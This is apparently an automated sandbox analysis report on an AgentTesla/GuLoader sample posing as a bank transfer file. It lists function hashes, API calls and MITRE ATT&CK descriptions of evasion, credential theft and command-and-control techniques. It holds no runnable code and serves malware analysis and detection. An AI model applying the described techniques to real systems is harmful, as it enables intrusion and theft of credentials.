Function 2157F928, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 2157F9A6

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 4af232926a26c98b10d13d2ca7886834100767973c0f2aff0ab26073f3d6d19a
Instruction ID: 841892a5e6c5b3c3878a814fc36f3314dfc2ddb153a9a487318dc3836251d174
Opcode Fuzzy Hash: 4af232926a26c98b10d13d2ca7886834100767973c0f2aff0ab26073f3d6d19a
Instruction Fuzzy Hash: 3A212FB5D006098EDB14CF9AD881ADEFBF4BF89214F10856ED469B7600D374A949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B2BB1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,012B2B91,00000800), ref: 012B2C22

Memory Dump Source

Source File: 00000004.00000002.112527957094.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bd2a91747c452bf01dc8b5d468ba9ca4c8fdd1735a2ce89ad87a528f50f709f8
Instruction ID: dffa61078c02c22ada57bb8bfe7150b567217a5a64e87b8900a1a783d7d7c7d2
Opcode Fuzzy Hash: bd2a91747c452bf01dc8b5d468ba9ca4c8fdd1735a2ce89ad87a528f50f709f8
Instruction Fuzzy Hash: 401114B1D003498FDB14CFAAD484ADEFBF4AF88360F11882ED559A7600C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C37C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1E3C53B6

Memory Dump Source

Source File: 00000004.00000002.112539349898.000000001E3C0000.00000040.00000001.sdmp, Offset: 1E3C0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0eddb8792cb77fa08ee587a043c3cf67b4fa75c3b4f5aabc2fcc1b1b99cf54bf
Instruction ID: 13d97ca6dcb77ced9ba59f87f4edcc9f737d9de095762c25e84bc7fb59bab34a
Opcode Fuzzy Hash: 0eddb8792cb77fa08ee587a043c3cf67b4fa75c3b4f5aabc2fcc1b1b99cf54bf
Instruction Fuzzy Hash: F71120B5D006099FCB10CF9AC444B9EFBF4AF89320F10852AD919B7240C3B4A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B59F8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 012B6905

Memory Dump Source

Source File: 00000004.00000002.112527957094.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cadf8de42aaf66da804cc123b4501709b1e5d9aeb02f5afd6af3065e381d62cc
Instruction ID: 052bff16691e0c4f74615f13dad61a7a42522d309b23069fe1a852c0ed4e78a8
Opcode Fuzzy Hash: cadf8de42aaf66da804cc123b4501709b1e5d9aeb02f5afd6af3065e381d62cc
Instruction Fuzzy Hash: BF1115B0900649CFCB20DF9AD485BDEBFF8EB48364F108419D558A7710D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 012B68AC, Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 012B6905

Memory Dump Source

Source File: 00000004.00000002.112527957094.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6f3296f10024ff4f408fdf21f9474d21f79e70c4e58e78b90fb5989472fe06c2
Instruction ID: 0d8320deeef77a863caa283b2f85a4274eb0fb7a05632e65581d59d1a62f13e7
Opcode Fuzzy Hash: 6f3296f10024ff4f408fdf21f9474d21f79e70c4e58e78b90fb5989472fe06c2
Instruction Fuzzy Hash: 8A1115B19006898FCB10CFAAD484BDEFFF8EF49324F148859D558A7601D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1E38D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112538940255.000000001E38D000.00000040.00000001.sdmp, Offset: 1E38D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1732b8f1b9d6cc6d5acbfe613bc6755d200398e9e944479b9acf3f4444fbe60
Instruction ID: 9a201db8243a20039e19f0bc9c8855ac8d1e44d07dfdbfef445ff704d992dd9b
Opcode Fuzzy Hash: c1732b8f1b9d6cc6d5acbfe613bc6755d200398e9e944479b9acf3f4444fbe60
Instruction Fuzzy Hash: 12210671504244DFDB00CF50D9C4F0ABB6EEB84324F24C769D8090B24AC736E856C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 1E39D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112539033256.000000001E39D000.00000040.00000001.sdmp, Offset: 1E39D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc64b1bfd740ba8d96cacc879f64ba67d635d9a41bb82b136c8287308e96896e
Instruction ID: 06d6c22c366b7b5fc997e0303b1db1ce7ff55234b5a821333982b991ae7ab002
Opcode Fuzzy Hash: dc64b1bfd740ba8d96cacc879f64ba67d635d9a41bb82b136c8287308e96896e
Instruction Fuzzy Hash: 5721F271604240DFDB04DF64D989B0ABB6AEB84314F64CBADD8494B346C33BD846DA62

Uniqueness

Uniqueness Score: -1.00%

Function 1E39D007, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112539033256.000000001E39D000.00000040.00000001.sdmp, Offset: 1E39D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99be2bc43bdaddd67cca85d9072d1a4387aca18ab4476849bff9b85e6b3cc31f
Instruction ID: bed3fefa3e812fc14c48302c9235c928df6c1330122a94db0dd4fa95919eda08
Opcode Fuzzy Hash: 99be2bc43bdaddd67cca85d9072d1a4387aca18ab4476849bff9b85e6b3cc31f
Instruction Fuzzy Hash: 6C2130755083809FD702CF24D994B05BF71EB46314F28C6DAD8498F6A6C33A985ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 1E38D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112538940255.000000001E38D000.00000040.00000001.sdmp, Offset: 1E38D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69433646c76fad984f07becd61db195f626b2abd9a0785222f31177ecb6dc3b
Instruction ID: ea18d1b935822bca21113b7e2cab3b0ddf688c9b47abb9e80e85e6e433fde612
Opcode Fuzzy Hash: c69433646c76fad984f07becd61db195f626b2abd9a0785222f31177ecb6dc3b
Instruction Fuzzy Hash: 301193B6504280DFDB01CF50D5C4B06BF72FB84324F24C7A9D9494B65AC33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012B6AC8, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

<0{ , xrefs: 012B6F90

Memory Dump Source

Source File: 00000004.00000002.112527957094.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Similarity

API ID:
String ID: <0{
API String ID: 0-1215823200
Opcode ID: 08bc84c6a5173d75a93ba779a181ab4aeaa92ad1ab39a999bdc798d68cd61ea9
Instruction ID: 60396f27f8d344712161252995cc36bab912db0637aad256af23e5163cbd4420
Opcode Fuzzy Hash: 08bc84c6a5173d75a93ba779a181ab4aeaa92ad1ab39a999bdc798d68cd61ea9
Instruction Fuzzy Hash: 2DF13930A1020ACFDB14CFA9C884BADBBF2FF88354F558559E509AF2A1DB74E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015F1D28, Relevance: .9, Instructions: 911COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3feaa910909673e7fe84252663f7a650f0a7e3476533e600f38144d444c3e254
Instruction ID: 9a1c95cb62a08fe0c779e40497e090553879dbba9a8ae67bb26d07a0b0fb8305
Opcode Fuzzy Hash: 3feaa910909673e7fe84252663f7a650f0a7e3476533e600f38144d444c3e254
Instruction Fuzzy Hash: 1162DCB6B153158FC7948F6DE9644ACB361FFC923970787BFC1898A952CB3598028F48

Uniqueness

Uniqueness Score: -1.00%

Function 015F3330, Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc8f7a71c8c177def168fa0177baf92a2535c8564c040fe691a53f0e8a317c5
Instruction ID: 865601fc5e84a693340188531db912a86d92da1cc2b305bf3257325f32208423
Opcode Fuzzy Hash: fdc8f7a71c8c177def168fa0177baf92a2535c8564c040fe691a53f0e8a317c5
Instruction Fuzzy Hash: 34F1B232705B13DBD7A18E9CE4601AEF7A2FFD167E716497EE2C589905C331A852CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0187A4C8, Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 790e5f232ae3dde208121b4624c9ff7585760400fddc9a9eef499b1fafe45093
Instruction ID: 1421833b89429f0f6aefc34eb9aeb962dd8bde6838dc1c89132ba60d9f3bf5bc
Opcode Fuzzy Hash: 790e5f232ae3dde208121b4624c9ff7585760400fddc9a9eef499b1fafe45093
Instruction Fuzzy Hash: 5B024934A102548FDB18DBB4C884BAEB7B6BF84305F1488A9D409DB795DF35ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 2157A4E8, Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112549414179.0000000021570000.00000040.00000010.sdmp, Offset: 21570000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d14847cde413ccc0c40f60aee1e0e99d4625f29f1943da7013497e551ba18234
Instruction ID: acc71446b0a7c1a079fc71d1c0b5032e7e9d4c42f149448f122c1871bd4032f4
Opcode Fuzzy Hash: d14847cde413ccc0c40f60aee1e0e99d4625f29f1943da7013497e551ba18234
Instruction Fuzzy Hash: 68C1C830B04259CBDF144FA589566BDBEFAEFC8710F18486DE846A6A44DF34C843DB61

Uniqueness

Uniqueness Score: -1.00%

Function 01870040, Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a95fdcd3ab5649605af86ad913c82061b2295afd6b661fad5f4844a3715318b
Instruction ID: b8acee0215e281b7083ffa3eb206c1727940807d8f01fd9916dc9d09147e8765
Opcode Fuzzy Hash: 9a95fdcd3ab5649605af86ad913c82061b2295afd6b661fad5f4844a3715318b
Instruction Fuzzy Hash: A2C1153250A365AFCF53DF78C44029A77E6AF43318B2591A8D244DF261EB3A8547EBC1

Uniqueness

Uniqueness Score: -1.00%

Function 015F68D8, Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e73a2ab4dfb3993cf11cd3897bd490fce2b6588c22187ebb0908ebc7628ee55b
Instruction ID: f72ea53251981f0b944d4995beb6adeb9b2cf88bc1cc2486cdec1d28eeed9c11
Opcode Fuzzy Hash: e73a2ab4dfb3993cf11cd3897bd490fce2b6588c22187ebb0908ebc7628ee55b
Instruction Fuzzy Hash: 96B1D130A043858FD705CB78C8506AE7BF6AF85304F1189AAE504DF396EB75EC4A8751

Uniqueness

Uniqueness Score: -1.00%

Function 015F41D1, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112528564195.00000000015F0000.00000040.00000010.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a31eea262a175169ce7b2680c1e9bbc601ff022fe769c50a22b2f572092abe5
Instruction ID: edefe26f66cdcc772a2b6ef049f10c09e5340733780dfc452531b82e49c430df
Opcode Fuzzy Hash: 8a31eea262a175169ce7b2680c1e9bbc601ff022fe769c50a22b2f572092abe5
Instruction Fuzzy Hash: F7B1C432704B23DFC3918E6CE5600AEF7A2FED167E326467ED2D589815C231A852CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0187D120, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea844693dcf0b45143a58fc25ec1874673fd5793491fce5cc93c2d64d1e5e70
Instruction ID: 77876d7617887a27966942095590266f18052f79566c3da3e708c627cf8cd30d
Opcode Fuzzy Hash: 5ea844693dcf0b45143a58fc25ec1874673fd5793491fce5cc93c2d64d1e5e70
Instruction Fuzzy Hash: BC912935B002049BDB14EBB9C895BAE76E6AFC4704F148A28E50ADB7D4DF35ED01C791

Uniqueness

Uniqueness Score: -1.00%

Function 012A1120, Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b813b69ce455a5176d913e6d563b187db6d78d5d0dab3761f9966b20d787a36
Instruction ID: dd1b17e5283d563a8327592303c17222a1b3b1362abbfe542f59badf3d81d5f9
Opcode Fuzzy Hash: 8b813b69ce455a5176d913e6d563b187db6d78d5d0dab3761f9966b20d787a36
Instruction Fuzzy Hash: 5891A334B142188BDB18DFB484956BEBBE7AFC8310F15896DE406E7384DF389852CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012B0890, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112527957094.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b58b42fdafffb26df30352064376118c097bde390a9a81a284e556f3ffcd4a2
Instruction ID: 0993660e866556af5d694954036f5fff05acd186e4c3b6ceeb4313601f6bf568
Opcode Fuzzy Hash: 9b58b42fdafffb26df30352064376118c097bde390a9a81a284e556f3ffcd4a2
Instruction Fuzzy Hash: 2DA17F32E1060A8FCF1ADFB4C8805EEBBB2FF84340B15456AE905AB265DB31E955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012A3708, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112527861845.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4505050adf10499827680c0a3d715f12bbe476fa8749037418d3db9c3b063fc
Instruction ID: 39902a4b20461e3fd6e2ede1e43a171e9f2dc5e3038c57e8a3c135549a95f849
Opcode Fuzzy Hash: c4505050adf10499827680c0a3d715f12bbe476fa8749037418d3db9c3b063fc
Instruction Fuzzy Hash: 7C917BB0E1024A9FDF14CFA9C8817DEBFF2BF88314F548529E505AB294EB749845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01876D10, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0df0ed0226b859f6159728d21c7c8296ecbc00361487529d8ff78ae7b2c3b89
Instruction ID: cc6f7510690f6a3988a22e5202a80014777b76739cde52b8683b2d47e8cd1fe3
Opcode Fuzzy Hash: c0df0ed0226b859f6159728d21c7c8296ecbc00361487529d8ff78ae7b2c3b89
Instruction Fuzzy Hash: BE915D72D00A098FEF21CF9CC8846DEBBB5FB49310F34882AE515E7251E335DA908B61

Uniqueness

Uniqueness Score: -1.00%

Function 01871157, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.112530417448.0000000001870000.00000040.00000010.sdmp, Offset: 01870000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b4f7e2039e4a23494558361c0bbe9641faed821d7dbbbf4090111e0bbeae90
Instruction ID: 949084d7999d0503b6c1cb03419ff955c3f7356aad3da7e6a0b20afc55ddf6d0
Opcode Fuzzy Hash: 09b4f7e2039e4a23494558361c0bbe9641faed821d7dbbbf4090111e0bbeae90
Instruction Fuzzy Hash: 6861A23250A766AFCF03EF78C440596B7F1AF43318722A6A9C2449F121EB76555BEBC0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Transferencia_29_11_2021 17.03.39.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre